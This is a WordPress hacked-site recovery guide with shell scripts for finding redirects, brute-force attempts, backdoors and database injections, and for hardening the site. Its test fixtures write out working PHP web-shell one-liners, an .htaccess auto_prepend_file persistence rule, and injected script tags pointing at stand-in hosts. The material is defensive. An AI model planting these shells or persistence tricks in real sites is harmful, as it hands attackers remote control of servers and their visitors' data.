
Most owners are shocked to find their WordPress site hacked. Everything works fine one day; the next, visitors see browser warnings, traffic drops, or you notice admin accounts you don’t recognize. The good news is that recovery is manageable if you act quickly and work through it methodically.
This guide shows you how to spot the warning signs of a hacked WordPress site, contain the infection, remove the malware completely, and harden the site so it doesn’t happen again. The steps apply whether you do the cleanup yourself or hire someone to do it. Let’s get started.
Signs Your WordPress Site Has Been Hacked
Catching a hacked WordPress website early makes the difference between a quick cleanup and a complete site rebuild. Most attacks don’t announce themselves with a defaced homepage. Instead, they operate quietly in the background, siphoning traffic or using your server to attack other sites.
Unexpected Redirects and Pop-ups
You open your homepage and land on a completely different site, usually one selling fake goods or worse. The redirect is often conditional: it fires only for visitors who aren’t logged in, only for a particular user agent, or only for visitors arriving from a search engine, so you won’t see it from your own admin session. From a different device, open your site in an incognito window, and also try reaching it by clicking your own listing in a Google search. If you end up on strange URLs, especially pharmaceutical spam or adult sites, that’s a clear sign that your WordPress site has been hacked.
Pop-ups that appear out of nowhere, especially ones you never configured, are a symptom of the same problem. Attackers inject JavaScript into your pages to show these ads and make money off your visitors.
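The conditional redirect check described above, as an added example that is not code from the original article: it fetches the same URL as a plain browser, as Googlebot, and as a visitor coming from Google, so cloaked redirects show up as a 30x for one profile and a 200 for another, and it greps saved HTML for the client-side redirect patterns (meta refresh, location assignments, eval(atob(...))) that an HTTP status never reveals. The URL is a placeholder, and the sample page is constructed for the example.

```shell
#!/bin/sh
# Added example, not code from the original article: probe a site for the
# conditional redirects described above and scan saved HTML for injected
# redirect code. https://your-site.example/ is a placeholder for your own URL.

# Request URL with a given User-Agent and Referer without following redirects;
# prints "<status> <Location target>" (target is empty when there is none).
fetch_as() {
    url=$1; ua=$2; ref=$3
    curl -s -o /dev/null -A "$ua" -e "$ref" \
        -w '%{http_code} %{redirect_url}\n' "$url"
}

# Fetch the same URL as a plain browser, as Googlebot, and as a visitor coming
# from a Google search. Cloaked malware shows a 200 for the first and a 30x
# pointing off-site for one or both of the others.
probe_site() {
    url=$1
    printf 'plain browser: '; fetch_as "$url" "Mozilla/5.0" ""
    printf 'Googlebot:     '; fetch_as "$url" \
        "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" ""
    printf 'from Google:   '; fetch_as "$url" "Mozilla/5.0" "https://www.google.com/"
}

# Server-side redirects are only half the picture: injected JavaScript and
# <meta refresh> tags redirect in the browser while the HTTP status stays 200.
# Prints matching lines and returns 1 if anything suspicious is found, else 0.
scan_html_for_redirects() {
    grep -n -i -E \
        'http-equiv=.?refresh|(window|document|top)\.location|location\.(href|replace)|eval\(atob\(|String\.fromCharCode|unescape\(' \
        "$1" && return 1
    return 0
}

# Constructed sample page (not captured from any real site) carrying both a
# meta refresh and an obfuscated JavaScript redirect.
make_sample_page() {
    cat > "$1" <<'EOF'
<html><head><title>My Blog</title>
<meta http-equiv="refresh" content="0;url=https://example.invalid/pharma">
</head><body>
<p>Welcome to my blog.</p>
<script>eval(atob("d2luZG93LmxvY2F0aW9uPSJodHRwczovL2V4YW1wbGUuaW52YWxpZC8i"));</script>
</body></html>
EOF
}

# Usage:
#   probe_site https://your-site.example/
#   curl -s -A "Mozilla/5.0" https://your-site.example/ > page.html
#   scan_html_for_redirects page.html || echo "redirect code found"
```

Run probe_site from a machine that is not your own admin workstation, since some malware also whitelists the IP address it last saw log in. A hit from scan_html_for_redirects is a lead, not a verdict: legitimate themes use location.href too, so read the matching line before you act on it.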
Warnings from Google Safe Browsing
When Google flags your site, search results show labels like “This site may be hacked” or “This site may harm your computer,” and Chrome and other browsers may block visitors outright with a full-page warning. Check the Security Issues report in Google Search Console: an alert there means Google has found malware, injected spam, or a phishing page on your site.
When this happens, your search traffic disappears overnight. Even after cleanup, getting off the blocklist takes time: you request a review from the same Search Console report, and Google re-crawls the site before lifting the warning. The sooner you act, the less your SEO suffers.
Suspicious Admin Users
To see all of your users, log into your WordPress dashboard and go to Users > All Users. Check for accounts you didn’t create, especially ones with the Administrator role, and also check the email address on your own admin account: attackers sometimes change it so that password resets go to them. Hackers create backdoor admin accounts so they can get back in even after you change your passwords; these fake accounts often have generic usernames like “admin2” or “support,” or strings of random characters. Delete any accounts that aren’t yours right away (when WordPress asks what to do with their content, delete it unless you have verified it is legitimate), but remember that this is just one symptom; you still need to find and remove the malware that created them.
Modified Website Content
If your pages and posts change, it’s a good sign that your WordPress site has been hacked. Attackers could put hidden links in your content that send visitors to dangerous pages, or they could rewrite whole pages to damage your site or send a message. Unlike sudden redirects, content changes often go unnoticed at first because they look like real posts.
Look over your most recent posts and pages for any text, links, or formatting that you didn’t add. Pay special attention to the bottom of old posts, where attackers like to drop hidden affiliate links or redirects, and switch the editor to its code view, since injected markup is often invisible in the visual editor (hidden spans, tiny font sizes, links coloured to match the background). If you suspect tampering, open the post and scroll down to “Revisions” to see what changed and when. Changes you don’t remember making mean someone else has been editing your content.
Immediate Containment Checklist
Once you’ve confirmed the site is hacked, time matters. These first steps keep the damage to a minimum while you prepare for a full cleanup.
Enable Maintenance Mode Immediately
Take the site offline for the public. This stops the malware from being served to visitors and limits further damage to your SEO. You can use a plugin like WP Maintenance Mode, or ask your hosting company to return a 503 response (or send traffic to a holding page) while you work. Keep in mind that maintenance mode only protects visitors: an attacker with a backdoor or valid credentials can still reach the site, which is why the password and cleanup steps follow immediately.
Change All Of Your Passwords
Change passwords for these accounts immediately:
- WordPress admin accounts (all of them)
- Hosting control panel (cPanel, Plesk, etc.)
- FTP/SFTP accounts
- Database user
- Email accounts tied to your domain
Use a password manager like 1Password or Bitwarden to generate strong, unique passwords of at least 16 characters with a mix of letters, numbers, and symbols. Weak and reused passwords are one of the most common ways in, and once attackers have a credential they try it everywhere. If you change the database password, update DB_PASSWORD in wp-config.php to match. Also rotate the eight security keys and salts in wp-config.php (AUTH_KEY through NONCE_SALT; WordPress.org generates a fresh set at https://api.wordpress.org/secret-key/1.1/salt/): this invalidates every existing login cookie, so a session the attacker already holds stops working.
Remove Unauthorized Admin Users
To see all of your users, log into your WordPress dashboard and click on Users. Look for accounts that you didn’t make, especially ones that have Administrator rights. If you see any accounts that look suspicious, hover over them and delete them right away. This stops attackers from keeping their backdoor access while you fix your hacked WordPress site.
Deactivate All Plugins and Themes
Go to Plugins and deactivate all of them. Next, go to Appearance > Themes and switch to a default WordPress theme, such as Twenty Twenty-Four. This takes any vulnerable extension code out of the request path while you investigate. Deactivating doesn’t delete the files, though: a web shell dropped inside a plugin directory still runs if it’s requested by URL, so the files still have to be cleaned or removed. If you can’t reach the dashboard, rename wp-content/plugins to something else via SFTP; WordPress treats plugins whose files are missing as deactivated. To find where the infection came from, re-enable plugins one at a time during the cleanup.
Document Everything Before You Start
Take screenshots of any errors, defacements, or strange activity, and write down when you first noticed the problem. If you have a security plugin, review its activity logs for your WordPress admin. This documentation helps you identify the entry point, decide how the recovery should proceed, and avoid getting reinfected the same way.
Even though your site files are infected, download a complete copy of them with your FTP/SFTP client, and export the database from phpMyAdmin. Store these compromised copies somewhere separate from your real backups. They are evidence that can help you understand the attack (timestamps, file names, injected code), but never restore from them.
Why WordPress Sites Get Hacked (Common Attack Types)
Knowing what kinds of attacks are common can help you stop WordPress hacks from happening again. Most hacks aren’t very complicated; they’re just automated bots looking for known holes in millions of sites.
Brute Force Login Attacks
Bots try thousands of username/password pairs against wp-login.php, and against xmlrpc.php, whose system.multicall method lets a single request carry many guesses at once. They target common usernames like “admin” and use lists of passwords leaked in other breaches. Password reuse and default credentials are what make these attacks work.
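Detection logic for the brute-force pattern above, as an added example that is not code from the original article: an awk pass over a combined-format access log (Apache or nginx) that counts credential POSTs to wp-login.php and xmlrpc.php per source IP and flags anything over a threshold. The log lines are constructed for the example; the file path in the usage line is a placeholder.

```shell
#!/bin/sh
# Added example, not code from the original article: find brute-force login
# activity in a combined-format access log (Apache or nginx) by counting
# credential POSTs per source IP. The log lines are constructed for the example.
# Usage: flag_login_bruteforce /var/log/apache2/access.log [threshold]

flag_login_bruteforce() {
    log=$1
    threshold=${2:-20}
    # Combined format: $1 = client IP, $6 = "\"METHOD", $7 = request path.
    # Count POSTs to wp-login.php and xmlrpc.php; the latter matters because
    # one xmlrpc system.multicall request can carry many password guesses.
    awk -v thr="$threshold" '
        $6 == "\"POST" && ($7 ~ /\/wp-login\.php/ || $7 ~ /\/xmlrpc\.php/) {
            hits[$1]++
            if ($7 ~ /xmlrpc/) xml[$1]++
        }
        END {
            for (ip in hits)
                if (hits[ip] >= thr)
                    printf "%s %d login-POSTs (%d via xmlrpc)\n", ip, hits[ip], xml[ip] + 0
        }' "$log" | sort -k2 -n -r
}

# Constructed sample log: one IP hammering wp-login.php, one using xmlrpc.php,
# and a legitimate admin who logs in once.
make_sample_log() {
    out=$1
    : > "$out"
    i=0
    while [ "$i" -lt 25 ]; do
        printf '203.0.113.10 - - [01/Jan/2025:10:00:%02d +0000] "POST /wp-login.php HTTP/1.1" 200 1512 "-" "Mozilla/5.0"\n' "$i" >> "$out"
        i=$((i + 1))
    done
    i=0
    while [ "$i" -lt 30 ]; do
        printf '198.51.100.7 - - [01/Jan/2025:10:01:%02d +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "python-requests/2.31"\n' "$i" >> "$out"
        i=$((i + 1))
    done
    printf '192.0.2.55 - - [01/Jan/2025:10:02:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "https://blog.example/wp-login.php" "Mozilla/5.0"\n' >> "$out"
    printf '192.0.2.55 - - [01/Jan/2025:10:02:01 +0000] "GET /wp-admin/ HTTP/1.1" 200 9000 "-" "Mozilla/5.0"\n' >> "$out"
}

# Usage: make_sample_log /tmp/access.log && flag_login_bruteforce /tmp/access.log 20
```

The threshold is per log file, so on a busy site run it against one day’s log at a time. A 302 on wp-login.php is what a successful login looks like, so an IP with hundreds of 200s followed by a single 302 is the case to worry about most: that is a guess that worked.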
Outdated Plugins and Themes
A lot of WordPress vulnerabilities are in plugins and themes, not in WordPress core. When a developer fixes a security hole, they release an update, and the accompanying advisory tells attackers exactly what to look for on sites that haven’t updated yet.
The worst offenders are abandoned plugins. If a plugin hasn’t been updated in more than two years, assume it has unpatched vulnerabilities. Nulled (pirated) premium plugins and themes are worse still: whoever cracked them often added backdoors on purpose.
SQL Injection Vulnerabilities
Poorly coded plugins build database queries by concatenating user input into SQL. Attackers inject SQL through form fields, URL parameters, or search boxes, and if it works they can dump the entire database (password hashes included), create new admin users, or modify your site’s content.
WordPress core runs its own queries through $wpdb->prepare(), which parameterizes values, but third-party plugins don’t always follow that practice. This is why code quality matters when choosing extensions.
Cross-Site Scripting (XSS)
XSS attacks use comment forms, user profiles, or any field that shows user input without proper filtering to add JavaScript to your site. This bad code then runs in the browsers of people who visit the site, which could steal session cookies or send them to phishing sites.
Stored XSS is especially dangerous because the bad script is saved in your database and affects everyone who sees that content. Wordfence’s WordPress Annual Security Report says that XSS was the most common type of vulnerability in 2024, making up about half of all WordPress vulnerabilities that were made public.
File Upload Exploits
When upload forms don’t validate file types properly, attackers upload PHP backdoors disguised as images. A file named “photo.jpg.php” can get past a check that only looks at the first extension or trusts the Content-Type header the client sends, and some server configurations execute any file with .php anywhere in its name. Once the file sits in a public directory, the attacker requests it directly, the server runs it, and they have a shell on your site.
Step-by-Step: How to Clean a Hacked WordPress Site
Manual cleanup takes some technical confidence, but it’s the most thorough approach. Work from a computer you trust, follow these steps in order, and you’ll be right as rain.
Scan and Identify WordPress Malware
Before removing anything, identify all infected files. If the dashboard is still accessible, install a security plugin like Wordfence Security (the free version is enough) and run a full scan. Review the results carefully. Wordfence compares your core, plugin and theme files against the clean versions in the WordPress.org repository and flags anything that differs.
Malware often hides in places a first scan misses. Get a second opinion from Sucuri’s free SiteCheck (a remote scanner that fetches your pages the way a visitor would) and upload any file you’re unsure about to VirusTotal. Look for base64-encoded strings, eval() calls, gzinflate() and similar decoders, and oddly named files in core directories. Also list files modified recently; that’s often a shortcut to the injected ones, though some malware resets timestamps, so treat it as a hint rather than proof. Once you have a list of suspect files, move on to removal, and keep in mind that a clean scan result proves nothing on its own.
Remove Malicious Users, Backdoors, and Files
To remove the malware, first connect via SFTP (FileZilla or similar). Go to wp-content/uploads/ and search for .php files (and .phtml, .phar, .php5). In a normal WordPress setup, uploads never contains executable PHP, so treat any such file as malicious. Download a copy for your records, then delete it. Also look for PHP code hidden in files with innocent extensions (.ico, .txt, .jpg) that another file includes; a file named like a favicon that starts with <?php is a backdoor.
Next, replace WordPress core files:
- Delete /wp-admin/ and /wp-includes/ completely
- Download a clean WordPress copy from WordPress.org
- Upload fresh wp-admin/ and wp-includes/ folders
- Overwrite the root core files (for example wp-login.php, wp-load.php, wp-settings.php)
- Do not overwrite wp-config.php or anything in wp-content/, but do inspect wp-content/mu-plugins/: must-use plugins load automatically, can’t be deactivated from the dashboard, and are easy to overlook, so attackers like to drop a loader there
Finally, review wp-config.php and .htaccess for unexpected code. In wp-config.php, remove anything obfuscated: base64_decode, eval, gzinflate, or include/require statements pointing anywhere other than wp-settings.php. In .htaccess, look for RewriteCond lines keyed on HTTP_USER_AGENT or HTTP_REFERER that send certain visitors elsewhere, and for php_value auto_prepend_file, which loads a file of the attacker’s choice before every PHP request (check .user.ini and php.ini in the web root for the same directive). If you’re unsure, replace .htaccess with the default WordPress rules and re-save your permalinks.
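A triage sweep covering the scan indicators, the uploads check and the config-file review above, as an added example that is not code from the original article. It lists executable files and hidden PHP under uploads/, PHP files with obfuscation or dynamic-eval patterns, config files carrying auto_prepend_file or user-agent/referrer rewrites, and recently modified files. The site path is a placeholder and the fixture tree is constructed; the pattern lists are a starting point, not a complete signature set.

```shell
#!/bin/sh
# Added example, not code from the original article: a triage sweep for the
# indicators the cleanup steps above describe. Everything it prints needs a
# human look; base64_decode() and eval() also appear in legitimate plugins.
# Usage: sweep_site /var/www/html

# 1. Anything executable under uploads/ is wrong by default, and so is PHP
#    hidden in a file with an innocent extension (.ico, .jpg, .txt).
find_uploads_php() {
    up="$1/wp-content/uploads"
    [ -d "$up" ] || return 0
    find "$up" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.phar' -o -name '*.php[0-9]' \)
    find "$up" -type f ! -name '*.php' -exec grep -l '<?php' {} + 2>/dev/null
    return 0
}

# 2. Obfuscation and dynamic-execution patterns in PHP files.
find_obfuscated_php() {
    find "$1" -type f -name '*.php' -exec grep -lE \
        'eval\(|base64_decode\(|gzinflate\(|gzuncompress\(|str_rot13\(|create_function\(|preg_replace\(.*/e[^a-z]' \
        {} + 2>/dev/null
    return 0
}

# 3. Files changed in the last N days (default 7). Some malware resets
#    timestamps, so an empty list proves nothing, but a full one is a map
#    of where to look first.
find_recent() {
    find "$1" -type f -mtime "-${2:-7}" ! -path '*/wp-content/cache/*'
}

# 4. Persistence in config files: rewrite rules keyed on the visitor's user
#    agent or referrer (cloaked redirects), obfuscation in wp-config.php, and
#    auto_prepend_file, which makes PHP load a file of the attacker's choice
#    before every request without touching any WordPress file. The include
#    pattern deliberately skips wp-config's own "require_once ABSPATH . ..." line.
find_config_persistence() {
    pat="auto_prepend_file|auto_append_file|HTTP_USER_AGENT|HTTP_REFERER|base64_decode|eval\(|(include|require)(_once)?[[:space:]]*\(?[[:space:]]*@?['\"]"
    find "$1" -type f \( -name '.htaccess' -o -name '.user.ini' -o -name 'php.ini' -o -name 'wp-config.php' \) \
        -exec grep -lE "$pat" {} + 2>/dev/null
    return 0
}

sweep_site() {
    root=$1
    echo "== executable or PHP-bearing files under uploads/"; find_uploads_php "$root"
    echo "== PHP files with obfuscation or dynamic-eval patterns"; find_obfuscated_php "$root"
    echo "== config-file persistence"; find_config_persistence "$root"
    echo "== files modified in the last 7 days"; find_recent "$root" 7
}

# Constructed fixture (not a real site): a tiny WordPress-shaped tree with a
# legitimate plugin, a disguised backdoor in uploads, PHP hidden in a fake
# favicon, and an .htaccess that prepends that favicon to every request.
make_fixture() {
    r=$1
    mkdir -p "$r/wp-content/uploads/2024/05" "$r/wp-includes" "$r/wp-content/plugins/legit"
    printf '<?php\nfunction legit_helper($a) { return $a + 1; }\n' > "$r/wp-content/plugins/legit/legit.php"
    printf '<?php\nfunction wp_legit() { return true; }\n' > "$r/wp-includes/functions.php"
    printf 'GIF89a (not really an image)\n' > "$r/wp-content/uploads/2024/05/photo.jpg"
    printf '<?php eval(base64_decode($_POST["c"])); ?>\n' > "$r/wp-content/uploads/2024/05/photo.jpg.php"
    printf '<?php system($_GET["c"]); ?>\n' > "$r/wp-content/uploads/2024/05/favicon_abc123.ico"
    printf 'php_value auto_prepend_file /var/www/html/wp-content/uploads/2024/05/favicon_abc123.ico\nRewriteEngine On\n' > "$r/.htaccess"
    printf "<?php\ndefine('DB_NAME', 'wp');\nrequire_once ABSPATH . 'wp-settings.php';\n" > "$r/wp-config.php"
}

# Usage: make_fixture /tmp/wp && sweep_site /tmp/wp
```

Run it once before you delete anything and keep the output with your incident notes; the list of recently modified files is also the quickest way to spot a second copy of a backdoor that the first scanner missed.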
Update Plugins, Themes, and Core
Once you’ve replaced compromised files, update everything to the latest versions immediately. Most WordPress hacks start with an outdated plugin, theme, or core install. Log into your dashboard and go to Dashboard → Updates.
If WordPress offers a newer version, update it. To refresh your existing core files without changing versions, use the Re-install button on the same page. This overwrites the WordPress core files with clean copies, which undoes any modification to them, without touching wp-content or your database.
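The integrity check behind the re-install step and behind scanners that compare core files to clean copies, as an added example that is not code from the original article. Given a manifest in md5sum’s “HASH  path” format, it reports modified and missing core files and, more usefully, files present under wp-admin/ and wp-includes/ that the manifest doesn’t list, which is where dropped-in backdoors sit. The site path is a placeholder, the fixture is constructed, and the usage comment that fetches a real manifest assumes the WordPress.org checksums endpoint and an installed jq.

```shell
#!/bin/sh
# Added example, not code from the original article: verify a WordPress tree
# against a checksum manifest. With WP-CLI installed, `wp core verify-checksums`
# does this against WordPress.org; this script does the same offline from a
# manifest in md5sum's "HASH  path" format and also lists files in wp-admin/
# and wp-includes/ that the manifest doesn't know. Requires GNU coreutils.
# Usage: verify_core /var/www/html /path/to/manifest.txt
# To build a real manifest (assumes jq is installed; version must match yours):
#   curl -s 'https://api.wordpress.org/core/checksums/1.0/?version=6.5.2&locale=en_US' \
#     | jq -r '.checksums | to_entries[] | "\(.value)  \(.key)"' > manifest.txt

verify_core() {
    root=$1
    # resolve the manifest to an absolute path because we cd into the tree
    manifest=$(cd "$(dirname "$2")" && pwd)/$(basename "$2")
    tmp=${TMPDIR:-/tmp}
    # Modified or missing files ("path: FAILED" / "path: FAILED open or read").
    ( cd "$root" && md5sum -c --quiet "$manifest" 2>&1 ) | grep 'FAILED' || true
    # Extra files: present under the core directories, absent from the manifest.
    ( cd "$root" && find wp-admin wp-includes -type f ) | sort > "$tmp/present.$$"
    sed 's/^[0-9a-f]*  //' "$manifest" | sort > "$tmp/expected.$$"
    comm -23 "$tmp/present.$$" "$tmp/expected.$$" | sed 's/^/extra: /'
    rm -f "$tmp/present.$$" "$tmp/expected.$$"
}

# Constructed fixture: a three-file "core", a manifest taken while it is clean
# (standing in for the WordPress.org list), then a simulated compromise that
# modifies one file, drops in another, and deletes a third.
make_fixture() {
    r=$1
    mkdir -p "$r/wp-admin" "$r/wp-includes"
    printf '<?php // admin\n' > "$r/wp-admin/index.php"
    printf '<?php function wp_ok() { return 1; }\n' > "$r/wp-includes/functions.php"
    printf '<?php // login\n' > "$r/wp-login.php"
    ( cd "$r" && md5sum wp-admin/index.php wp-includes/functions.php wp-login.php ) > "$r/manifest.txt"
    printf '<?php function wp_ok() { return 1; } eval($_POST["x"]);\n' > "$r/wp-includes/functions.php"
    printf '<?php /* dropped in */\n' > "$r/wp-includes/class-wp-x.php"
    rm "$r/wp-admin/index.php"
}

# Usage: make_fixture /tmp/wp && verify_core /tmp/wp /tmp/wp/manifest.txt
```

Expect a few legitimate “extra” entries on a real install (for example a wp-content-style cache directory some hosts put under wp-includes); anything ending in .php that you cannot account for is the thing to open.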
Update WordPress plugins individually. If you’re unsure whether you still need a plugin, remove it. Fewer plugins means fewer attack surfaces. For themes, update WordPress themes and delete any inactive themes. Even disabled themes can be exploited if they contain vulnerabilities.
Clean WordPress Database
WordPress malware doesn’t always live in files. Attackers often inject spam links, malicious scripts, or code directly into the database, which means your site can stay compromised even after you’ve cleaned the filesystem.
Start by opening your database in phpMyAdmin (or your host’s database tool) and export a full backup before making any changes. Then check the most common persistence points:
- Users: look for unfamiliar administrator accounts and remove anything you didn’t create.
- Options: verify that siteurl, home, and the admin email are correct, and watch for injected scripts or strange values.
- Posts and comments: search for spam links, hidden <script> tags, iframes, and unexpected HTML that doesn’t belong.
Remove suspicious entries carefully, then re-scan your site to confirm nothing is reappearing. If the database is heavily infected or you’re unsure what’s legitimate, restoring from a known-clean backup is often the safest path, but make sure the backup predates the intrusion and not just the first symptom; attackers often sit quietly for weeks before you notice anything.
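The three database checks above run against the SQL export you just made, as an added example that is not code from the original article: it reads the option values for siteurl and home, lists every user whose serialized wp_capabilities contains “administrator” together with their login and email, and groups every <script> and <iframe> tag in the dump so a mass injection shows as one line with a large count. It assumes the default wp_ table prefix and mysqldump/phpMyAdmin-style INSERT … VALUES lines; the dump is constructed for the example with abbreviated columns.

```shell
#!/bin/sh
# Added example, not code from the original article: triage the phpMyAdmin /
# mysqldump export you just made, so you can review the persistence points
# listed above without running queries against the live database. Assumes the
# default "wp_" table prefix and INSERT ... VALUES (...),(...) dump lines.
# The dump below is constructed for the example (columns abbreviated).

# Value of one wp_options row, e.g. dump_option dump.sql siteurl
dump_option() {
    grep -oE "'$2','[^']*'" "$1" | head -1 | sed "s/^'$2','//; s/'\$//"
}

# Report siteurl/home values that don't match what they should be.
dump_check_urls() {
    for opt in siteurl home; do
        v=$(dump_option "$1" "$opt")
        [ "$v" = "$2" ] || echo "$opt is '$v', expected '$2'"
    done
}

# Every user whose wp_capabilities serialization contains "administrator":
# prints "ID login email" so you can compare against the people you know.
# wp_users column order: ID, user_login, user_pass, user_nicename, user_email, ...
dump_admin_users() {
    dump=$1
    for id in $(grep -oE "\([0-9]+,[0-9]+,'wp_capabilities','[^)]*administrator[^)]*\)" "$dump" | cut -d, -f2); do
        grep 'INSERT INTO `wp_users`' "$dump" \
            | grep -oE "\($id,'[^']*','[^']*','[^']*','[^']*'" | head -1 \
            | awk -F"'" -v id="$id" '{ print id, $2, $8 }'
    done
}

# Script and iframe tags anywhere in the dump (posts, comments, options),
# grouped so a mass injection shows up as one line with a big count.
dump_injected_markup() {
    grep -oiE '<(script|iframe)[^>]*>' "$1" | sort | uniq -c | sort -rn
}

# Constructed sample dump: a real admin, an author, a planted "support" admin,
# a rewritten home URL, and a script tag in both an option and a post.
make_sample_dump() {
    cat > "$1" <<'EOF'
INSERT INTO `wp_users` VALUES (1,'alice','$P$Bxxxxxxxx','alice','alice@blog.example','','2020-01-01 00:00:00','',0,'alice'),(2,'bob','$P$Byyyyyyyy','bob','bob@blog.example','','2021-01-01 00:00:00','',0,'bob'),(3,'support','$P$Bzzzzzzzz','support','kq8@mail.invalid','','2025-01-01 03:12:44','',0,'support');
INSERT INTO `wp_usermeta` VALUES (1,1,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(2,2,'wp_capabilities','a:1:{s:6:\"author\";b:1;}'),(3,3,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}');
INSERT INTO `wp_options` VALUES (1,'siteurl','https://blog.example','yes'),(2,'home','https://example.invalid','yes'),(3,'admin_email','alice@blog.example','yes'),(99,'_transient_wpx','<script src=\"https://example.invalid/j.js\"></script>','yes');
INSERT INTO `wp_posts` VALUES (10,1,'2024-01-01 00:00:00','<p>Hello world</p><script src=\"https://example.invalid/t.js\"></script>','Hello world','publish');
EOF
}

# Usage:
#   make_sample_dump /tmp/dump.sql
#   dump_check_urls /tmp/dump.sql https://blog.example
#   dump_admin_users /tmp/dump.sql
#   dump_injected_markup /tmp/dump.sql
```

The script-tag check also catches injections stored in option rows such as transients and widget text, which the posts and comments screens never show you; the same grep applied to a dump taken after cleanup is the re-scan the text recommends.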
WordPress Malware Removal Services
DIY cleanup can work if you’re technically confident, but professional services can save time and reduce the risk of missed backdoors. Many providers also offer security hardening and monitoring options to help prevent reinfection.
When to Hire an Expert
Consider professional WordPress malware removal if:
- You’ve cleaned the site yourself but the infection keeps returning
- You don’t have time to handle the technical work safely
- Your host has suspended your account due to malicious activity
- Your site is still flagged as unsafe after cleanup
- You’re concerned about hidden backdoors or persistent access
What Professional Services Include
Reputable malware removal services typically offer:
- File and database cleanup, including backdoors that automated scanners may miss. Many services combine automated scanning with manual review by security analysts.
- Blacklist removal support, including guidance on review requests for Google and other security services.
- Root cause investigation, to identify the most likely entry point such as a vulnerable plugin, compromised credentials, or misconfiguration.
- Security hardening recommendations, tailored to your site and hosting environment.
- Cleanup warranties, often 15–30 days depending on the provider and plan. Some services re-clean the site at no additional cost if it’s reinfected within the warranty period.
Service Costs and Options
Professional WordPress malware removal is usually priced either as a one-time cleanup or as a monthly security plan. One-time cleanups run from about $59 to $400 or more per site, depending on how bad the infection is and whether the service includes database cleanup, hardening, and blocklist support.
Depending on the plan, monthly security subscriptions can start at $10 to $20 a month and include things like ongoing monitoring, firewall protection, and malware cleanup. A subscription model can be better than a one-time fix for sites that deal with transactions or sensitive data because it focuses on prevention and early detection, not just cleanup.
Check what’s included before you buy. Some services charge extra for blocklist support, quick turnaround, or hardening. Read customer reviews carefully and look for complaints about hidden fees, upsells, or incomplete cleanups that come up repeatedly.
After Cleanup: WordPress Security Hardening
Cleaning malware solves the immediate problem. WordPress security hardening reduces the chance of reinfection and makes your site a harder target.
Strengthen Login Security
If you still log in as “admin,” change it: create a new administrator account with a different username, log in with it, delete the old account, and attribute its content to the new account when WordPress prompts you. Don’t expect much from this on its own, though: usernames are easy to discover through author archive URLs and the REST API, so rate limiting and 2FA are what actually stop brute force.
Use a security plugin or a supported module to turn on two-factor authentication (2FA) for all admin accounts. Also, turn on login rate limiting to make brute force attacks take longer. Set reasonable limits that don’t keep real users out.
If you don’t use XML-RPC (for example, you don’t use the WordPress mobile app or Jetpack features that need it), turn it off in your security plugin or on the web server level.
Lock Down File Permissions
Use restrictive file permissions to reduce what an attacker can modify. Typical safe defaults are:
- Directories: 755
- Files: 644
- wp-config.php: as strict as your hosting setup allows (often 600–640)
Never use 777 permissions. If your host provides a file manager, use it to apply permissions carefully and avoid breaking ownership settings: files should be owned by your hosting account’s user, and the web server should only be able to write where it has to (uploads, plus the plugin and theme directories if you rely on dashboard updates).
Disable the built-in WordPress file editor by adding this line to wp-config.php, above the line that reads /* That's all, stop editing! Happy publishing. */:
define('DISALLOW_FILE_EDIT', true);
This removes the Theme and Plugin Editor from wp-admin, which limits the damage an attacker can do with a compromised admin account: they can no longer paste PHP into a theme file from the browser.
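The permission lockdown, the DISALLOW_FILE_EDIT change and a block on PHP execution in uploads, applied as one script, as an added example that is not code from the original article. It also shows how to check what is still world-writable afterwards. The site path is a placeholder, the Apache directives are standard 2.4 syntax, and the fixture tree is constructed.

```shell
#!/bin/sh
# Added example, not code from the original article: apply the permission,
# DISALLOW_FILE_EDIT and uploads-execution hardening described above to a
# WordPress tree, with a check that shows what is still world-writable.
# Usage: harden_wordpress /var/www/html   (run as the file owner, not root)

harden_permissions() {
    root=$1
    find "$root" -type d -exec chmod 755 {} +
    find "$root" -type f -exec chmod 644 {} +
    if [ -f "$root/wp-config.php" ]; then chmod 600 "$root/wp-config.php"; fi
}

# Lists anything writable by "other"; an empty result is what you want.
world_writable() {
    find "$1" -perm -002
}

# Add define('DISALLOW_FILE_EDIT', true); above the "stop editing" marker,
# idempotently, keeping the file's mode. The marker matters: a define placed
# after wp-settings.php is loaded has no effect.
enable_disallow_file_edit() {
    cfg=$1
    if grep -q 'DISALLOW_FILE_EDIT' "$cfg"; then return 0; fi
    if ! grep -q 'stop editing' "$cfg"; then
        echo "no 'stop editing' marker in $cfg; add the define above wp-settings.php by hand" >&2
        return 1
    fi
    line="define('DISALLOW_FILE_EDIT', true);"
    cp -p "$cfg" "$cfg.tmp" \
        && awk -v line="$line" '/stop editing/ && !done { print line; done = 1 } { print }' "$cfg" > "$cfg.tmp" \
        && mv "$cfg.tmp" "$cfg"
}

# Stop Apache from executing PHP placed in uploads/ (2.4 syntax). nginx ignores
# .htaccess; there, use a location block that denies .php under uploads.
block_php_in_uploads() {
    up="$1/wp-content/uploads"
    mkdir -p "$up"
    cat > "$up/.htaccess" <<'EOF'
<FilesMatch "\.(php|phtml|phar|php[0-9])$">
  Require all denied
</FilesMatch>
EOF
}

harden_wordpress() {
    enable_disallow_file_edit "$1/wp-config.php"
    block_php_in_uploads "$1"
    harden_permissions "$1"     # last, so new and edited files get the right mode
    world_writable "$1"
}

# Constructed fixture: a tree left at 777 with a stock-style wp-config.php.
make_fixture() {
    r=$1
    mkdir -p "$r/wp-content/uploads" "$r/wp-includes"
    printf "<?php\ndefine('DB_NAME', 'wp');\n/* That's all, stop editing! Happy publishing. */\nrequire_once ABSPATH . 'wp-settings.php';\n" > "$r/wp-config.php"
    printf '<?php\n' > "$r/wp-includes/functions.php"
    chmod -R 777 "$r"
}

# Usage: make_fixture /tmp/wp && harden_wordpress /tmp/wp
```

On nginx the equivalent of the .htaccess rule is a location block such as location ~* /wp-content/uploads/.*\.php$ { deny all; } placed before the PHP handler location. If 600 on wp-config.php breaks the site, your host runs PHP under a different user than the file owner; fall back to 640 with the web server’s group, as the text suggests.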
Regular Maintenance Schedule
WordPress security is ongoing. Create a maintenance routine:
- Weekly: update plugins/themes, review admin users, run a security scan
- Monthly: verify backups and test restores, review security logs, check Search Console warnings
- Quarterly: audit plugins and remove unused ones, review permissions and key settings
